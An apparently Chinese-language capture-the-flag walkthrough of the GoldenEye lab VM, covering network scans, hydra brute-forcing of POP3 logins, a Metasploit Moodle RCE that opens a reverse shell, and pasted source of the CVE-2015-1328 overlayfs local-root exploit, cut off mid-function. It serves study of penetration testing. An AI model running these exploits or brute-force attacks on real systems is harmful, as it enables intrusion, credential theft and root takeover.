┌──(root㉿kali)-[~]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:26:ba:69, IPv4: 192.168.3.11
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.3.1 00:50:56:c0:00:08 VMware, Inc.
192.168.3.2 00:50:56:e4:e9:e5 VMware, Inc.
192.168.3.13 00:0c:29:4a:22:25 VMware, Inc.
192.168.3.254 00:50:56:e4:7d:ff VMware, Inc.
192.168.3.1 00:50:56:c0:00:08 VMware, Inc. (DUP: 2)

7 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.014 seconds (127.11 hosts/sec). 4 responded


┌──(root㉿kali)-[~]
└─# nmap -Pn -A -sV -T4 -p- 192.168.3.13
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-15 06:56 EDT
Nmap scan report for 192.168.3.13
Host is up (0.00032s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE VERSION
25/tcp open smtp Postfix smtpd
| ssl-cert: Subject: commonName=ubuntu
| Not valid before: 2018-04-24T03:22:34
|_Not valid after: 2028-04-21T03:22:34
|_ssl-date: TLS randomness does not represent time
|_smtp-commands: ubuntu, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: GoldenEye Primary Admin Server
55006/tcp open ssl/pop3 Dovecot pop3d
|_pop3-capabilities: SASL(PLAIN) AUTH-RESP-CODE USER CAPA PIPELINING TOP UIDL RESP-CODES
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2018-04-24T03:23:52
|_Not valid after: 2028-04-23T03:23:52
|_ssl-date: TLS randomness does not represent time
55007/tcp open pop3 Dovecot pop3d
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2018-04-24T03:23:52
|_Not valid after: 2028-04-23T03:23:52
|_pop3-capabilities: AUTH-RESP-CODE STLS UIDL USER CAPA SASL(PLAIN) RESP-CODES TOP PIPELINING
MAC Address: 00:0C:29:4A:22:25 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

TRACEROUTE
HOP RTT ADDRESS
1 0.32 ms 192.168.3.13

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 36.60 seconds

image-20241015185830813

访问对应目录

image-20241015185905198

于是寻找可疑用户名密码

源码terminal.js

/**
 * Banner copy for the typing effect in terminal.js, keyed by the `id` of the
 * element that displays it. Values are HTML fragments (they contain <br/> and
 * <span> tags), which is why the typing loop writes them with innerHTML; the
 * content is static, author-controlled text, not user input.
 */
var data = [{ GoldenEyeText: "<span><br/>Severnaya Auxiliary Control Station<br/>****TOP SECRET ACCESS****<br/>Accessing Server Identity<br/>Server Name:....................<br/>GOLDENEYE<br/><br/>User: UNKNOWN<br/><span>Naviagate to /sev-home/ to login</span>" }];

//
//Boris, make sure you update your default password.
//My sources say MI6 maybe planning to infiltrate.
//Be on the lookout for any suspicious network traffic....
//
//I encoded you p@ssword below...
//
//&#73;&#110;&#118;&#105;&#110;&#99;&#105;&#98;&#108;&#101;&#72;&#97;&#99;&#107;&#51;&#114;
//
//BTW Natalya says she can break your codes
//

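/**
 * Typewriter effect for every element carrying the "typeing" class.
 *
 * Each element's id selects an HTML fragment in data[0]; the fragment is
 * revealed one character at a time with a blinking cursor span appended.
 * While the current character is inside a tag ("<" ... ">") the next
 * character is appended synchronously, so markup is never rendered
 * half-written; otherwise output is paced at 60 ms per character.
 *
 * Changes from the original loop:
 * - per-element state (element, text, i, isTag) lives in a closure, so
 *   several "typeing" elements no longer share one set of function-scoped
 *   `var`s and overwrite each other's progress;
 * - isTag starts as false rather than undefined;
 * - an element whose id has no string entry in data[0] is skipped instead
 *   of throwing on undefined.slice;
 * - the element from the collection is used directly instead of a second
 *   getElementById lookup.
 *
 * Kept as-is: the loop stops as soon as the slice equals the full text, so
 * the final character is never written and the cursor span stays on screen.
 *
 * The fragment is assigned via innerHTML because it is markup. That is only
 * safe while `data` remains a static, author-controlled constant; text that
 * comes from users or the server must not be routed through this path.
 */
var allElements = document.getElementsByClassName("typeing");

Array.prototype.forEach.call(allElements, function (element) {
  var devTypeText = data[0][element.id];
  if (typeof devTypeText !== "string") return;

  var i = 0;
  var isTag = false;

  (function type() {
    var text = devTypeText.slice(0, ++i);
    if (text === devTypeText) return;
    element.innerHTML = text + `<span class='blinker'>&#32;</span>`;
    var char = text.slice(-1);
    if (char === "<") isTag = true;
    if (char === ">") isTag = false;
    // Inside a tag: recurse without delay; otherwise wait 60 ms per character.
    if (isTag) return type();
    setTimeout(type, 60);
  })();
});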

username

Boris
Natalya

password

&#73;&#110;&#118;&#105;&#110;&#99;&#105;&#98;&#108;&#101;&#72;&#97;&#99;&#107;&#51;&#114;

image-20241015190319310

得到密码

InvincibleHack3r

成功登录

image-20241015190437284

GoldenEye is a Top Secret Soviet oribtal weapons project.  Since you have access you definitely hold a Top Secret clearance and qualify to be a certified GoldenEye Network Operator (GNO)

Please email a qualified GNO supervisor to receive the online GoldenEye Operators Training to become an Administrator of the GoldenEye system

Remember, since security by obscurity is very effective, we have configured our pop3 service to run on a very high non-default port

POP3服务器的默认端口是110,结合前面的nmap全端口扫描发现此处为55006,55007

┌──(root㉿kali)-[~]
└─# nmap -Pn -A -sV -T4 -p- 192.168.3.13
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-15 06:56 EDT
Nmap scan report for 192.168.3.13
Host is up (0.00032s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE VERSION
25/tcp open smtp Postfix smtpd
| ssl-cert: Subject: commonName=ubuntu
| Not valid before: 2018-04-24T03:22:34
|_Not valid after: 2028-04-21T03:22:34
|_ssl-date: TLS randomness does not represent time
|_smtp-commands: ubuntu, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: GoldenEye Primary Admin Server
55006/tcp open ssl/pop3 Dovecot pop3d
|_pop3-capabilities: SASL(PLAIN) AUTH-RESP-CODE USER CAPA PIPELINING TOP UIDL RESP-CODES
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2018-04-24T03:23:52
|_Not valid after: 2028-04-23T03:23:52
|_ssl-date: TLS randomness does not represent time
55007/tcp open pop3 Dovecot pop3d
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2018-04-24T03:23:52
|_Not valid after: 2028-04-23T03:23:52
|_pop3-capabilities: AUTH-RESP-CODE STLS UIDL USER CAPA SASL(PLAIN) RESP-CODES TOP PIPELINING
MAC Address: 00:0C:29:4A:22:25 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

使用海德拉爆破

hydra -L user.txt -P /root/yiyi/wordlists-master/fasttrack.txt -s -t 32 55007 -V 192.168.3.13 pop3 -I 

image-20241015192749712

得到

[55007][pop3] host: 192.168.4.202   login: natalya   password: bird
[55007][pop3] host: 192.168.4.202 login: boris password: secret1!

nc连接登录boris后查看邮件

┌──(root㉿kali)-[~/yiyi/tmp]
└─# nc 192.168.3.13 55007
+OK GoldenEye POP3 Electronic-Mail System
user boris
+OK
pass secret1!
+OK Logged in.
list
+OK 3 messages:
1 544
2 373
3 921
.
retr 1
+OK 544 octets
Return-Path: <root@127.0.0.1.goldeneye>
X-Original-To: boris
Delivered-To: boris@ubuntu
Received: from ok (localhost [127.0.0.1])
by ubuntu (Postfix) with SMTP id D9E47454B1
for <boris>; Tue, 2 Apr 1990 19:22:14 -0700 (PDT)
Message-Id: <20180425022326.D9E47454B1@ubuntu>
Date: Tue, 2 Apr 1990 19:22:14 -0700 (PDT)
From: root@127.0.0.1.goldeneye

Boris, this is admin. You can electronically communicate to co-workers and students here. I'm not going to scan emails for security risks because I trust you and the other admins here.
.
retr 2
+OK 373 octets
Return-Path: <natalya@ubuntu>
X-Original-To: boris
Delivered-To: boris@ubuntu
Received: from ok (localhost [127.0.0.1])
by ubuntu (Postfix) with ESMTP id C3F2B454B1
for <boris>; Tue, 21 Apr 1995 19:42:35 -0700 (PDT)
Message-Id: <20180425024249.C3F2B454B1@ubuntu>
Date: Tue, 21 Apr 1995 19:42:35 -0700 (PDT)
From: natalya@ubuntu

Boris, I can break your codes!
.
retr 3
+OK 921 octets
Return-Path: <alec@janus.boss>
X-Original-To: boris
Delivered-To: boris@ubuntu
Received: from janus (localhost [127.0.0.1])
by ubuntu (Postfix) with ESMTP id 4B9F4454B1
for <boris>; Wed, 22 Apr 1995 19:51:48 -0700 (PDT)
Message-Id: <20180425025235.4B9F4454B1@ubuntu>
Date: Wed, 22 Apr 1995 19:51:48 -0700 (PDT)
From: alec@janus.boss

Boris,

Your cooperation with our syndicate will pay off big. Attached are the final access codes for GoldenEye. Place them in a hidden file within the root directory of this server then remove from this email. There can only be one set of these acces codes, and we need to secure them for the final execution. If they are retrieved and captured our plan will crash and burn!

Once Xenia gets access to the training site and becomes familiar with the GoldenEye Terminal codes we will push to our final stages....

PS - Keep security tight or we will be compromised.

.

有一份文件用了GoldenEye的访问代码作为附件进行发送,存在根目录

查看natalya

┌──(root㉿kali)-[~/yiyi/tmp]
└─# nc 192.168.3.13 55007
+OK GoldenEye POP3 Electronic-Mail System
user natalya
+OK
pass bird
+OK Logged in.
list
+OK 2 messages:
1 631
2 1048
.
retr 1
+OK 631 octets
Return-Path: <root@ubuntu>
X-Original-To: natalya
Delivered-To: natalya@ubuntu
Received: from ok (localhost [127.0.0.1])
by ubuntu (Postfix) with ESMTP id D5EDA454B1
for <natalya>; Tue, 10 Apr 1995 19:45:33 -0700 (PDT)
Message-Id: <20180425024542.D5EDA454B1@ubuntu>
Date: Tue, 10 Apr 1995 19:45:33 -0700 (PDT)
From: root@ubuntu

Natalya, please you need to stop breaking boris' codes. Also, you are GNO supervisor for training. I will email you once a student is designated to you.

Also, be cautious of possible network breaches. We have intel that GoldenEye is being sought after by a crime syndicate named Janus.
.
retr 2
+OK 1048 octets
Return-Path: <root@ubuntu>
X-Original-To: natalya
Delivered-To: natalya@ubuntu
Received: from root (localhost [127.0.0.1])
by ubuntu (Postfix) with SMTP id 17C96454B1
for <natalya>; Tue, 29 Apr 1995 20:19:42 -0700 (PDT)
Message-Id: <20180425031956.17C96454B1@ubuntu>
Date: Tue, 29 Apr 1995 20:19:42 -0700 (PDT)
From: root@ubuntu

Ok Natalyn I have a new student for you. As this is a new system please let me or boris know if you see any config issues, especially is it's related to security...even if it's not, just enter it in under the guise of "security"...it'll get the change order escalated without much hassle :)

Ok, user creds are:

username: xenia
password: RCP90rulez!

Boris verified her as a valid contractor so just create the account ok?

And if you didn't have the URL on outr internal Domain: severnaya-station.com/gnocertdir
**Make sure to edit your host file since you usually work remote off-network....

Since you're a Linux user just point this servers IP to severnaya-station.com in /etc/hosts.


.

一个密码本

username: xenia
password: RCP90rulez!

以及域名绑定信息

Since you're a Linux user just point this servers IP to severnaya-station.com in /etc/hosts.

修改hosts后重新访问severnaya-station.com/gnocertdir

whatweb扫描指纹

whatweb 是一个命令行工具,用于识别和分析网站的技术信息。它能够探测网站的服务器、操作系统、Web 应用程序、内容管理系统(如 WordPress、Joomla)、框架、库、版本号、安全性信息等。

┌──(root㉿kali)-[~]
└─# whatweb severnaya-station.com/gnocertdir
http://severnaya-station.com/gnocertdir [301 Moved Permanently]
- Server: Apache/2.4.7 (Ubuntu)
- Country: RESERVED [ZZ]
- HTTP Server: Ubuntu Linux, Apache/2.4.7
- IP: 192.168.3.13
- Redirect: http://severnaya-station.com/gnocertdir/
- Title: 301 Moved Permanently

http://severnaya-station.com/gnocertdir/ [200 OK]
- Server: Apache/2.4.7 (Ubuntu)
- Content-Language: en
- Cookies: MoodleSession
- Country: RESERVED [ZZ]
- HTTP Server: Ubuntu Linux, Apache/2.4.7
- IP: 192.168.3.13
- CMS: Moodle
- PHP Version: 5.5.9-1ubuntu4.24
- Scripts: footer, head, text/css, text/javascript
- Title: GoldenEye Operators Training - Moodle
- Uncommon Headers: content-script-type, content-style-type
- X-Frame-Options: sameorigin
- X-Powered-By: PHP/5.5.9-1ubuntu4.24

image-20241015195220289

乱点一通发现需要登录

image-20241015195241611

使用对应的密码登录

image-20241015195524962

messages底下有个邮件

image-20241015195759711

Tuesday, 24 April 2018
09:24 PM: Greetings Xenia,

As a new Contractor to our GoldenEye training I welcome you. Once your account has been complete, more courses will appear on your dashboard. If you have any questions message me via email, not here.

My email username is...

doak

Thank you,

Cheers,

Dr. Doak "The Doctor"
Training Scientist - Sr Level Training Operating Supervisor
GoldenEye Operations Center Sector
Level 14 - NO2 - id:998623-1334
Campus 4, Building 57, Floor -8, Sector 6, cube 1,007
Phone 555-193-826
Cell 555-836-0944
Office 555-846-9811
Personal 555-826-9923
Email: doak@
Please Recycle before you print, Stay Green aka save the company money!
"There's such a thing as Good Grief. Just ask Charlie Brown" - someguy
"You miss 100% of the shots you don't shoot at" - Wayne G.
THIS IS A SECURE MESSAGE DO NOT SEND IT UNLESS.

新用户继续爆破

┌──(root㉿kali)-[~]
└─# hydra -l doak -P /usr/share/dict/cracklib-small -s 55007 192.168.3.13 pop3 -V -t 64

得到密码

4England!

切换用户登录cms,发现secret

image-20241015200558094

下载

007,

I was able to capture this apps adm1n cr3ds through clear txt.

Text throughout most web apps within the GoldenEye servers are scanned, so I cannot add the cr3dentials here.

Something juicy is located here: /dir007key/for-007.jpg

Also as you may know, the RCP-90 is vastly superior to any other weapon and License to Kill is the only way to play.

007,
我能够通过明文(clear text)捕获此应用程序的 adm1n cr3ds。
GoldenEye服务器内的大多数Web应用程序中的文本都会被扫描,因此我无法在此处添加 cr3dentials。
这里有一些有趣的东西:/dir007key/for-007.jpg
另外,正如您可能知道的那样,RCP-90远远优于任何其他武器,而《杀戮许可证》是唯一的游戏方式。

发现Something juicy is located here: /dir007key/for-007.jpg

访问

http://severnaya-station.com/dir007key/for-007.jpg

image-20241015200823286

得到key

xWinter1995x!

以此密码登录admin

web端通了,于是想办法打进去

属于Moodle 2.2.3

image-20241015201218051

搜索相关漏洞执行后发现没能成功,搜索发现需要修改执行PSpellShell
https://www.exploit-db.com/exploits/29324
's_editor_tinymce_spellengine' => 'PSpellShell',

image-20241015202151300

┌──(root㉿kali)-[~]
└─# msfconsole
Metasploit tip: You can use help to view all available commands

`:oDFo:`
./ymM0dayMmy/.
-+dHJ5aGFyZGVyIQ==+-
`:sm⏣~~Destroy.No.Data~~s:`
-+h2~~Maintain.No.Persistence~~h+-
`:odNo2~~Above.All.Else.Do.No.Harm~~Ndo:`
./etc/shadow.0days-Data'%20OR%201=1--.No.0MN8'/.
-++SecKCoin++e.AMd` `.-://///+hbove.913.ElsMNh+-
-~/.ssh/id_rsa.Des- `htN01UserWroteMe!-
:dopeAW.No<nano>o :is:TЯiKC.sudo-.A:
:we're.all.alike'` The.PFYroy.No.D7:
:PLACEDRINKHERE!: yxp_cmdshell.Ab0:
:msf>exploit -j. :Ns.BOB&ALICEes7:
:---srwxrwx:-.` `MS146.52.No.Per:
:<script>.Ac816/ sENbove3101.404:
:NT_AUTHORITY.Do `T:/shSYSTEM-.N:
:09.14.2011.raid /STFU|wall.No.Pr:
:hevnsntSurb025N. dNVRGOING2GIVUUP:
:#OUTHOUSE- -s: /corykennedyData:
:$nmap -oS SSo.6178306Ence:
:Awsm.da: /shMTl#beats3o.No.:
:Ring0: `dDestRoyREXKC3ta/M:
:23d: sSETEC.ASTRONOMYist:
/- /yo- .ence.N:(){ :|: & };:
`:Shall.We.Play.A.Game?tron/
```-ooy.if1ghtf0r+ehUser5`
..th3.H1V3.U2VjRFNN.jMh+.`
`MjM~~WE.ARE.se~~MMjMs
+~KANSAS.CITY's~-`
J~HAKCERS~./.`
.esc:wq!:`
+++ATH`
`


=[ metasploit v6.4.29-dev ]
+ -- --=[ 2458 exploits - 1261 auxiliary - 430 post ]
+ -- --=[ 1471 payloads - 49 encoders - 11 nops ]
+ -- --=[ 9 evasion ]

Metasploit Documentation: https://docs.metasploit.com/

search Moodle
msf6 > search Moodle

Matching Modules
================

# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/http/moodle_admin_shell_upload 2019-04-28 excellent Yes Moodle Admin Shell Upload
1 exploit/multi/http/moodle_spelling_binary_rce 2013-10-30 excellent Yes Moodle Authenticated Spelling Binary RCE
2 exploit/multi/http/moodle_spelling_path_rce 2021-06-22 excellent Yes Moodle SpellChecker Path Authenticated Remote Command Execution
3 exploit/multi/http/moodle_teacher_enrollment_priv_esc_to_rce 2020-07-20 good Yes Moodle Teacher Enrollment Privilege Escalation to RCE


Interact with a module by name or index. For example info 3, use 3 or use exploit/multi/http/moodle_teacher_enrollment_priv_esc_to_rce

msf6 > use 1
msf6 exploit(multi/http/moodle_spelling_binary_rce) > info

Name: Moodle Authenticated Spelling Binary RCE
Module: exploit/multi/http/moodle_spelling_binary_rce
Platform: Unix, Linux
Arch: cmd
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Excellent
Disclosed: 2013-10-30

Provided by:
Brandon Perry <bperry.volatile@gmail.com>

Module side effects:
config-changes
ioc-in-logs

Module stability:
crash-safe

Module reliability:
repeatable-session

Available targets:
Id Name
-- ----
=> 0 Automatic

Check supported:
Yes

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD yes Password to authenticate with
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploi
t.html
RPORT 80 yes The target port (TCP)
SESSKEY no The session key of the user to impersonate
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI /moodle/ yes The URI of the Moodle installation
USERNAME admin yes Username to authenticate with
VHOST no HTTP server virtual host

Payload information:

Description:
Moodle allows an authenticated user to define spellcheck settings via the web interface.
The user can update the spellcheck mechanism to point to a system-installed aspell binary.
By updating the path for the spellchecker to an arbitrary command, an attacker can run
arbitrary commands in the context of the web application upon spellchecking requests.

This module also allows an attacker to leverage another privilege escalation vuln.
Using the referenced XSS vuln, an unprivileged authenticated user can steal an admin sesskey
and use this to escalate privileges to that of an admin, allowing the module to pop a shell
as a previously unprivileged authenticated user.

This module was tested against Moodle version 2.5.2 and 2.2.3.

References:
https://nvd.nist.gov/vuln/detail/CVE-2013-3630
https://nvd.nist.gov/vuln/detail/CVE-2013-4341
https://www.exploit-db.com/exploits/28174
https://www.rapid7.com/blog/post/2013/10/30/seven-tricks-and-treats


View the full module info with the info -d command.

msf6 exploit(multi/http/moodle_spelling_binary_rce) > set username admin
username => admin
msf6 exploit(multi/http/moodle_spelling_binary_rce) > set password xWinter1995x!
password => xWinter1995x!
msf6 exploit(multi/http/moodle_spelling_binary_rce) > set rhost severnaya-station.com
rhost => severnaya-station.com
msf6 exploit(multi/http/moodle_spelling_binary_rce) > set targeturi /gnocertdir
targeturi => /gnocertdir
msf6 exploit(multi/http/moodle_spelling_binary_rce) > set payload cmd/unix/reverse
payload => cmd/unix/reverse
msf6 exploit(multi/http/moodle_spelling_binary_rce) > set lhost 192.168.3.11
lhost => 192.168.3.11
msf6 exploit(multi/http/moodle_spelling_binary_rce) > exploit

[*] Started reverse TCP double handler on 192.168.3.11:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Exploitable Moodle version 2.2 detected
[*] Authenticating as user: admin
[*] Getting session key to update spellchecker if no session key was specified
[*] Updating spellchecker to use the system aspell
[*] Triggering payload
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo 4XKzS89jZGiRslot;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "4XKzS89jZGiRslot\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 1 opened (192.168.3.11:4444 -> 192.168.3.13:41072) at 2024-10-16 06:41:37 -0400

python3 -c 'import pty;pty.spawn("/bin/bash")'
<ditor/tinymce/tiny_mce/3.4.9/plugins/spellchecker$ find / -perm -u=s -type f 2>/dev/null
<.9/plugins/spellchecker$ find / -perm -u=s -type f 2>/dev/null
/bin/umount
/bin/ping6
/bin/ping
/bin/su
/bin/mount
/bin/fusermount
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/mtr
/usr/bin/passwd
/usr/bin/traceroute6.iputils
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/pt_chown
/usr/sbin/pppd
/usr/sbin/uuidd

相关信息

<ditor/tinymce/tiny_mce/3.4.9/plugins/spellchecker$ find / -perm -u=s -type f 2>/dev/null
<.9/plugins/spellchecker$ find / -perm -u=s -type f 2>/dev/null
/bin/umount
/bin/ping6
/bin/ping
/bin/su
/bin/mount
/bin/fusermount
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/mtr
/usr/bin/passwd
/usr/bin/traceroute6.iputils
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/pt_chown
/usr/sbin/pppd
/usr/sbin/uuidd
<ditor/tinymce/tiny_mce/3.4.9/plugins/spellchecker$ uname -a
uname -a
Linux ubuntu 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
<ditor/tinymce/tiny_mce/3.4.9/plugins/spellchecker$ lsb_release -a
lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 14.04.1 LTS
Release: 14.04
Codename: trusty

搜索得到对应cve

https://www.exploit-db.com/exploits/37292
/*
# Exploit Title: ofs.c - overlayfs local root in ubuntu
# Date: 2015-06-15
# Exploit Author: rebel
# Version: Ubuntu 12.04, 14.04, 14.10, 15.04 (Kernels before 2015-06-15)
# Tested on: Ubuntu 12.04, 14.04, 14.10, 15.04
# CVE : CVE-2015-1328 (http://people.canonical.com/~ubuntu-security/cve/2015/CVE-2015-1328.html)

*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*
CVE-2015-1328 / ofs.c
overlayfs incorrect permission handling + FS_USERNS_MOUNT

user@ubuntu-server-1504:~$ uname -a
Linux ubuntu-server-1504 3.19.0-18-generic #18-Ubuntu SMP Tue May 19 18:31:35 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
user@ubuntu-server-1504:~$ gcc ofs.c -o ofs
user@ubuntu-server-1504:~$ id
uid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),30(dip),46(plugdev)
user@ubuntu-server-1504:~$ ./ofs
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# id
uid=0(root) gid=0(root) groups=0(root),24(cdrom),30(dip),46(plugdev),1000(user)

greets to beist & kaliman
2015-05-24
%rebel%
*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*
*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sched.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/mount.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sched.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/mount.h>
#include <sys/types.h>
#include <signal.h>
#include <fcntl.h>
#include <string.h>
#include <linux/sched.h>

/* Source text of the preload library that main() writes to /tmp/ofs-lib.c
 * and compiles to /tmp/ofs-lib.so. It defines a replacement getuid(): when
 * the loading process has euid 0 and /proc/self/exe resolves to /bin/su it
 * unlinks /etc/ld.so.preload and /tmp/ofs-lib.so (so neither file is left
 * behind), sets uid/gid to 0 and exec's an interactive /bin/sh; in any other
 * process it forwards to the real getuid() located with dlsym(). */
#define LIB "#include <unistd.h>\n\nuid_t(*_real_getuid) (void);\nchar path[128];\n\nuid_t\ngetuid(void)\n{\n_real_getuid = (uid_t(*)(void)) dlsym((void *) -1, \"getuid\");\nreadlink(\"/proc/self/exe\", (char *) &path, 128);\nif(geteuid() == 0 && !strcmp(path, \"/bin/su\")) {\nunlink(\"/etc/ld.so.preload\");unlink(\"/tmp/ofs-lib.so\");\nsetresuid(0, 0, 0);\nsetresgid(0, 0, 0);\nexecle(\"/bin/sh\", \"sh\", \"-i\", NULL, NULL);\n}\n return _real_getuid();\n}\n"

/* 1 MiB stack for the clone()'d child that runs child_exec(); main() passes
 * its top end (child_stack + 1024*1024), as the stack grows downward on
 * x86_64. */
static char child_stack[1024*1024];

/* Body of the clone()'d child. It runs inside the user namespace that
 * main()'s wrapper process unshared and the mount namespace created by
 * CLONE_NEWNS, so the mount() calls below are issued by an unprivileged
 * user and only succeed on kernels with the permission-handling flaw named
 * in the file header (CVE-2015-1328).
 *
 * Step 1: overlay a kernel-owned directory (lower) on /tmp/ns_sploit/upper
 * (upper) and rename() a root-owned file from the lower layer to
 * ld.so.preload; because the rename goes through the overlay, a copy of the
 * file ends up in the upper directory.
 * Step 2: overlay /tmp/ns_sploit/upper (lower) on /etc (upper) and chmod()
 * the renamed file through the overlay, which copies it up into /etc as a
 * world-writable /etc/ld.so.preload. main() checks for exactly that result.
 *
 * Each mount has a fallback for newer kernels that require the "overlay"
 * fstype and a workdir= option. `stuff` is unused. The scratch tree
 * /tmp/ns_sploit is left in place for main() to remove. */
static int
child_exec(void *stuff)
{
char *file;
// start from an empty scratch tree; every path below lives under it
system("rm -rf /tmp/ns_sploit");
mkdir("/tmp/ns_sploit", 0777);
mkdir("/tmp/ns_sploit/work", 0777);
mkdir("/tmp/ns_sploit/upper",0777);
mkdir("/tmp/ns_sploit/o",0777);

fprintf(stderr,"mount #1\n");
// MS_MGC_VAL is the legacy mount() magic value, i.e. no mount flags
if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/proc/sys/kernel,upperdir=/tmp/ns_sploit/upper") != 0) {
// workdir= and "overlay" is needed on newer kernels, also can't use /proc as lower
if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/sys/kernel/security/apparmor,upperdir=/tmp/ns_sploit/upper,workdir=/tmp/ns_sploit/work") != 0) {
fprintf(stderr, "no FS_USERNS_MOUNT for overlayfs on this kernel\n");
exit(-1);
}
// lower-layer file to rename when the apparmor directory is the lower dir
file = ".access";
chmod("/tmp/ns_sploit/work/work",0777);
} else file = "ns_last_pid"; // lower-layer file to rename when /proc/sys/kernel is the lower dir

chdir("/tmp/ns_sploit/o");
rename(file,"ld.so.preload");

chdir("/");
umount("/tmp/ns_sploit/o");
fprintf(stderr,"mount #2\n");
// same mount pair as above, now with /etc as the upper directory
if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc") != 0) {
if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc,workdir=/tmp/ns_sploit/work") != 0) {
exit(-1);
}
chmod("/tmp/ns_sploit/work/work",0777);
}

// chmod() on the lower-layer file makes overlayfs copy it up into /etc;
// 0777 is what lets main() later open it O_WRONLY as the unprivileged user
chmod("/tmp/ns_sploit/o/ld.so.preload",0777);
umount("/tmp/ns_sploit/o");
// NOTE(review): control reaches the end of a non-void function; the exit
// status this clone()'d child reports to its parent is unspecified.
}

/* Sets up the namespaces, runs child_exec() in them, then installs the
 * preload library.
 *
 * Process tree: main -> wrapper (fork; unshare(CLONE_NEWUSER)) -> init
 * (fork) -> clone(child_exec, CLONE_NEWNS). Each ancestor waits for its
 * child; main usleep()s 300 ms and then wait()s for the wrapper.
 *
 * Afterwards main treats a writable /etc/ld.so.preload as proof that the
 * overlay step worked, writes LIB to /tmp/ofs-lib.c, compiles it with gcc,
 * writes the .so path into ld.so.preload, removes the scratch tree and the
 * .c file, and execl()s /bin/su so the setuid binary picks the library up
 * through the loader's /etc/ld.so.preload handling.
 *
 * Host-side artifacts worth alerting on: creation or chmod 0777 of
 * /etc/ld.so.preload, the /tmp/ns_sploit tree, /tmp/ofs-lib.c and
 * /tmp/ofs-lib.so, a compiler run by an unprivileged service account, and
 * overlay mounts originating from an unprivileged user namespace.
 * argc/argv are unused. */
int
main(int argc, char **argv)
{
int status, fd, lib;
pid_t wrapper, init;
int clone_flags = CLONE_NEWNS | SIGCHLD;

fprintf(stderr,"spawning threads\n");

if((wrapper = fork()) == 0) {
// failure is only reported; execution continues regardless
if(unshare(CLONE_NEWUSER) != 0)
fprintf(stderr, "failed to create new user namespace\n");

if((init = fork()) == 0) {
pid_t pid =
clone(child_exec, child_stack + (1024*1024), clone_flags, NULL);
if(pid < 0) {
fprintf(stderr, "failed to create new mount namespace\n");
exit(-1);
}

waitpid(pid, &status, 0);

}

